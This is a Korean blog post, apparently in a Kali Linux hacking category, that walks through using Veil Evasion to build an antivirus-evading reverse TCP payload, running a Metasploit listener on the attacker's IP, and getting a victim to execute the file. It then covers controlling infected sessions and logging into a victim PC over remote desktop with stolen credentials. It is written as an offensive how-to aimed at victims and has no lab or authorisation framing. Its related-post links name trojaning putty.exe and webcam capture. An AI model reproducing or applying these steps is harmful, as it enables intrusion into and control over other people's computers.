Veil Evasion은 Veil 프레임워크에서 사용할수 있는 악성코드 제작 도구입니다.
https://github.com/Veil-Framework/Veil
위 페이지에서 git clone으로 받아서 사용하시면 됩니다.
[명령어 및 사용법]
Veil 폴더에 가서 ./Veil.py로 실행
>use 1 - Evasion을 사용합니다
>list - payload 목록을 확인합니다. [저는 reverse tcp를 사용합니다.]
>use 28 - rev_tcp 페이로드 사용
>set lhost [해커아이피] - 리스닝 호스트를 설정합니다. 위에 옵션들을 보면 설정할수있는 것들이 있는데 취향껏 설정하시면 됩니다.
>generate - 악성코드를 생성합니다.
악성코드 생성이 끝나면 바이러스 파일과 소스코드 파일, 리스너 rc파일 등의 경로가 나오는데
바이러스 파일과 리스너 rc파일의 해당 경로로 가서 파일을 루트로 가져와주는게 편할것입니다.
>service postgresql start - 핸들러 실행을 위한 서비스 실행
>msfconsole -r [evasion으로 얻은 리스너rc파일명] - 리스너를 실행
이렇게 하고 아까 만든 바이러스 파일을 어떻게든 피해자의 컴퓨터에서 실행하게 하면 되는겁니다.
악성코드를 msfvenom이 아닌 다른 툴로 생성한것이라 보시면 됩니다.
세션이 연결된 후 [감염된 후] 해커 터미널에서
>sessions - 감염된 세션이 보입니다.
>sessions -i [세션 Id] - 세션을 연결합니다. ex)sessions -i 1
세션이 연결되면 이제 악성 명령을 수행할 수 있게 됩니다.
ex)sysinfo,screenshot 등
Veil evasion으로 만든 악성코드가 msfvenom 보다는 백신에 강한것 같습니다.
[원격조종법]
우선적으로 피해자 컴퓨터에서 원격조종이 허용이 된 상태여야 가능합니다.
내컴퓨터 우클릭 - 속성 - 고급 시스템 설정 - 원격 - 원격 데스크톱의 설정에서 보안성이 낮은 원격조종 허용을 선택하고 적용합니다.
해커 컴퓨터에서 새 터미널을 열고
>sudo apt-get install rdesktop - 원격조종도구를 설치합니다.
>rdesktop [피해자 ip주소] -u [피해자컴 계정명] -p [피해자컴 비밀번호] -원격조종을 수행합니다.
rdesktop [피해자 ip주소] 후 접속해서 계정명과 비밀번호를 입력해도 됩니다.
계정명과 패스워드를 뚫은 상태여야 하며 해킹으로 강제로 변경하거나 사용자의 부주의로 원격 조종이 허용된 경우에만 사용이 가능한 방법입니다.
원격조종 수행시 피해자 컴은 로그아웃 상태가 됩니다. 로그온 시 rdesktop이 사라지며 원격 조종한 내용이 피해자 컴에 적용됩니다.
'2. 시스템 해킹 및 모의 해킹 > Kali Linux' 카테고리의 다른 글
칼리 리눅스 한글 설정법 (0) | 2024.10.11 |
---|---|
SMB 타겟 스캐닝 및 해당 취약점으로 윈 xp 해킹 (0) | 2023.12.27 |
putty.exe 안에 트로이목마 넣기 (0) | 2023.12.27 |
msfconsole 명령어 정리 - 핸드폰 위치추적 , 웹캠스냅[폰카메라 유출하기] (0) | 2023.12.27 |
암호로 압축된 파일의 압축파일 암호 알아내는법 - [fcrackzip] (0) | 2023.12.27 |